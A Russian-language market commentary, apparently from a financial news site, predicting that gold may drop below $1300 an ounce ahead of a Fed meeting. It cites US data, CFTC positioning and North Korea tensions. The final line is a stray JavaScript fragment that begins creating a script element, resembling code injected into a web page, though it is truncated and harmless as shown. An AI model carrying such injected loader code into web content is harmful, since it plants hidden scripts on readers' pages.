Золото на этой неделе может стать дешевле $1300 за унцию

Золото на этой неделе может стать дешевле $1300 за унцию

После непродолжительного роста в пятницу – практически до $1335 за унцию на фоне сообщений об очередных ракетных испытаниях КНДР – котировки золота стали отступать.

На рынке наблюдался отток средств инвесторов из этого защитного актива, несмотря на разочаровывающие данные из США по розничным продажам и промышленному производству за август.

По сравнению с июльским уровнем розничные продажи сократились на 0,2% (ожидался рост на 0,1%), а промпроизводство уменьшилось на 0,9% (прогнозировалось увеличение на 0,1%). В обоих случаях негативная динамика объясняется последствиями урагана «Харви», которые могут привести к замедлению темпов экономического роста за третий квартал.

В пятницу доходность казначейских облигаций США повысилась, оказав давление на котировки золота, вложения в которые не приносят процентного дохода. Инвесторы готовятся к очередному заседанию ФРС, запланированному на 19-20 сентября.

Участники рынка учитывают в котировках и в целом ожидают появления более подробной информации о плане по сокращению баланса регулятора. Хотя повышения ставки по итогам этого заседания не ожидается, котировки золота, вероятно, окажутся под давлением, поскольку ускорение инфляции в последнее время служит предпосылкой для некоторого ужесточения риторики представителей Федрезерва.

Согласно данным Комиссии по торговле товарными фьючерсами (CFTC) за неделю с 6 по 12 сентября, хедж-фонды наращивали длинные позиции по золоту девятую неделю подряд, тогда как объем коротких позиций оставался весьма незначительным. На данный момент соотношение длинных и коротких позиций составляет уже 20,8 к 1, что практически вдвое больше, чем в сентябре прошлого года (13,2 к 1).

Как показывает опыт, столь сильный перекос может спровоцировать резкую коррекцию цен на фоне фиксации прибыли (так, в конце сентября 2016 года цена на золото упала на $80).

Если в ближайшее время не появится новых сообщений об эскалации конфликта с КНДР, решение ФРС США вполне может обусловить падение цен на золото на этой неделе ниже отметки $1300 за унцию.

Источник: Журнал о финансовых рынках

var d=document;var s=d.createElement(‘script’);